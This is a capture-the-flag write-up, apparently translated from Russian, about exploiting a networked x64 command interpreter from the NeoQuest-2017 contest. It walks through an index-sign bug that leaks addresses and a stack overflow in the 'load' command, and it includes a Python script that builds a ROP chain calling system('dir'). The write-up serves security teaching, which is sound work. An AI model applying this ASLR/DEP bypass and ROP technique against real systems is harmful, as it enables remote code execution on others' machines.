In the footsteps of Petya: find and exploit a software vulnerability

Sensational events of recent months clearly show how urgent the problem of critical software vulnerabilities is. Mass attacks against users using encryption viruses WannaCry and Petya were carried out by remotely exploiting zero-day vulnerabilities in Windows network services - SMBv1 and SMBv2. Finding and exploiting vulnerabilities for remote code execution is obviously not an easy task. However, the best of the best information security experts can do it all!

In one of the tasks of the on -site tour of NeoQuest-2017, it was necessary to find vulnerabilities in the program interpreter of commands accessible over the network, and with the help of their operation, execute the code on a remote server. To prove the hacking, it was necessary to read the contents of the file directory on the server - there, by condition, the task key was placed. The participants had access to a binary interpreter file. So, the ice has broken!

We start the study

First, launch the binary and see what it is. It becomes clear that the executable file of the PE format interpreter is intended for the Intel x64 architecture. It is also clear that it is compiled with DEP / ASLR support, but without CFG . Third-party libraries are also not loaded.

')
The program itself is a simple interpreter of commands for working with an integer vector. The syntax of the supported commands is available at the entrance to the program. The vector supports writing and reading values from cells, writing to a vector entirely.

With surface analysis finished, it's time to reverse - a full-time tour, time is running out!

And what to submit to the entrance?

The first intermediate task that needs to be addressed is the precise definition of the attack surface . We specify the number and format of commands by loading the binary into IDA Pro. The main function is easily found by searching for the displayed lines.

The analysis of the main function allows us to state the following:

1. 1. First, the address of the array array on the stack of the main function is stored in the variable array_base . In a loop, the array cells are initialized with zeros. The condition for exiting the loop allows you to know the size of the array - 100 (0x64) integer cells.

2. 2. The welcome screen is displayed and the user's command is read. The presence of the lines “cls” and “whoami” indicates the calling of the function system (in the future, this will come in handy for us).

3. Variable expressions are initialized to check the syntax correctness. It is seen that there are no undocumented commands. In addition, it becomes clear the set of permissible parameters for each instruction.

4. Consistently in an infinite loop, the entered command is checked for compliance with regular expressions. If a match is found for a command, the arguments of the command are calculated and its handler is called.

As a result of the analysis of the main function code, it was found that there are no undocumented commands. It is possible to influence the following parameters:

indexes in the set / get commands;
put value in the set command;
The size and contents of the buffer to write to the array.

Due to the presence of ASLR and DEP protection mechanisms, 2 vulnerabilities need to be found and implemented:

Address expansion vulnerability in executable memory — to bypass the ASLR and build a ROP chain with a DEP bypass;
vulnerability to intercept control flow at the address we control — to transfer control to the beginning of the ROP chain and execute code.

ROP (Return Oriented Programming) is a modern exploitation technique aimed at circumventing the DEP protection mechanism. The essence of this technique lies in reusing small fragments (gadgets) of executable memory before ret instructions. Chained addresses of gadgets are sequentially removed from the stack, executing commands in the gadget up to the ret command. She, in turn, removes from the stack the address of the next gadget, etc.

Vulnerability # 1

Now we know that the target array has a constant size and is located on the stack of the main function. Let's try to read a cell with an index that goes beyond the array.

First, at values larger than the array size, we observe normal behavior — output with an error message. However, when the values of the index are larger than 2147483647, the program either falls or returns some values.

It seems that the indices, which are treated as negative numbers, pass the bounds checking and return the contents of the memory at a negative index outside the bounds of the array. Vulnerability found!

Why it happens? The vulnerability lies in the incorrect processing of the index commands set / get . The numeric index in the array is read as a parameter of the set command and converted from string to numeric form by calling stoul . This function returns an unsigned integer .

However, when a parameter is passed to the SET / GET function, the same value is erroneously reduced to the significant integer y - it is compared with the size of the array and affects the result of the signed comparison command jl . The GET command returns the value of the memory cell counted from the beginning of the array.

This feature can be used to read from the memory of any executable address. Since the array is located on the stack, by reading the cells of the array with negative indices we can view the contents of the stack before the array is located in it. Since the architecture is x64, addresses in memory occupy 8 bytes. Reading from the array is carried out by 4 bytes. Therefore, to read the address from memory, you must print two consecutive cells.

Using the debugger, we experimentally find such memory cells in front of the buffer where the executable address is located — for example, 4294967282 == -14 and 4294967283 == -13. We further use their meanings when building the ROP chain.

In addition, in the future, during operation, we need the address of the buffer on the stack. How to find it? Let's look at the beginning of the main function and see that the variable array_base stores a pointer to the beginning of the buffer.

On the stack, this variable is located at rsp + 0x358-0x328, and the buffer itself starts at rsp + 0x358-0x198.

Therefore, it is necessary to retreat (0x328-0x198) / 4 = 100 four-byte cells from the beginning of the array to read the variable array_base . Seeking offsets: 4294967196, 4294967197.

Due to this vulnerability, we opened the executable address in the process memory, and also found the address of the required buffer to accommodate the parameters of the ROP chain. Now you need to find a way to intercept the control flow of the program.

Vulnerability # 2

Until now, we have not investigated the load interpreter function. Let's look at it more closely. Very soon there is a classic buffer overflow on the stack. The string entered from the keyboard, the argument of the load command, is selected and transmitted as the first parameter of the LOAD handler function. The second parameter is the address of the required buffer.

The LOAD function writes the buffer to this buffer without any checks on its size. As you can see, the number of bytes written depends only on the size of the input string.

Having transferred a sufficiently large number of characters to the load command, it is possible to rewrite the return address on the stack and, with the exit from the interpreter, transfer control to the address we control. Taking into account the size and location of the buffer on the stack, the primary control transfer address must be placed with an offset of 4 * (100 + 2) bytes (an additional 8 bytes will overwrite the value of the rbp register stored on the stack).

Since the overflowed buffer is located on the stack, and not on the heap, we will locate the whole ROP chain in the same place - starting with the offset 4 * (100 + 2) in the input parameter of the load command.

Now all the ingredients are in place. The time has come to collect from them a combat exploit!

Pwn it!

To get the job key, you must read and display the contents of the local directory on the server. Earlier in the analysis, we noted that before displaying the greeting, the contents of the screen are cleared, and the username is present in the greeting.

Obviously, the function that does this and accepts the “cls” and “whoami” strings as parameters behaves like the library function system. You must call this function, but take “dir” as the executable command — display the contents of the local directory on the server.

Construct a ROP chain that allows this. The sequence of operations is as follows:

Place the string “dir” at the address that is known at the time the vulnerability was triggered.
Put the address of this string in the rcx register .
Transfer control to the system_func function.

When placing the addresses in the buffer, you need to remember about the presence of ASLR, and calculate them dynamically, using previously readable addresses of the executable memory and the beginning of the buffer. In addition, they are written to the buffer in accordance with the Little Endian notation, that is, from low bytes to high bytes.

Now you need to find the offset of the necessary gadgets in the executable file of the interpreter. The first is needed to put the address of the string “dir ” in rcx , the second - to call the function system_fun c . By the offsets 0x24c00 and 0x16ce6, respectively, in the code section of the executable file of the interpreter are the necessary parts of the code.

The string "dir" we put after the gadgets. Its address, therefore, will be 4 * (100 + 2) + 6 * 4 bytes more than the buffer address.

Below is our version of the script to generate the contents of the buffer:

from __future__ import print_function import sys n = 102 f=open("buf.txt", "w") base_l = 0x2f150000 - 0x0 # get 4294967282 base_h = 0x7ff6 # get 4294967283 buffer_l = 0x0afcf6e0 # get 4294967196 buffer_h = 0xe8 # get 4294967197 def rev(x): return ((x << 24) & 0xff000000 | (x << 8) & 0x00ff0000 | (x >> 8) & 0x0000ff00 | (x >> 24) & 0x000000ff) arr = [ base_l + 0x24c00, base_h, # pop rcx ; ret buffer_l + n*0x4 + 6*0x4, buffer_h, # buffer ptr - in rdi base_l + 0x16ce6, base_h # &system in our binary ] for i in range(0,n): # dumb print("%08x" % rev(0xdeadbeef), end='', file=f) for i in arr: print("%08x" % rev(i), end='', file=f) # "dir\0" print("%08x" % 0x64697200, end='', file=f) f.close()

Everything is ready, it's time to go for the key!

Connect to a remote server, get the necessary addresses with the get command.
We generate a vulnerable buffer based on them.
Execute the load command, rewrite the return address from the main function.
Execute the exit command, which terminates the main function and launches the exploit.

Seeking key: fb520eb552747437c09f2770a9a282ea .

What is the result?

In NeoQUEST, we collect a wide variety of tasks that require knowledge from different areas of information security and are able to show what a careless attitude to security is fraught with: weak passwords, poor server implementation (we searched for the vulnerability in this article using fuzzing and described it in detail in this article ), weak ciphers. And the example of this task clearly shows how carelessness in programming can cause critical damage to the security of information.

Source: https://habr.com/ru/post/335046/

All Articles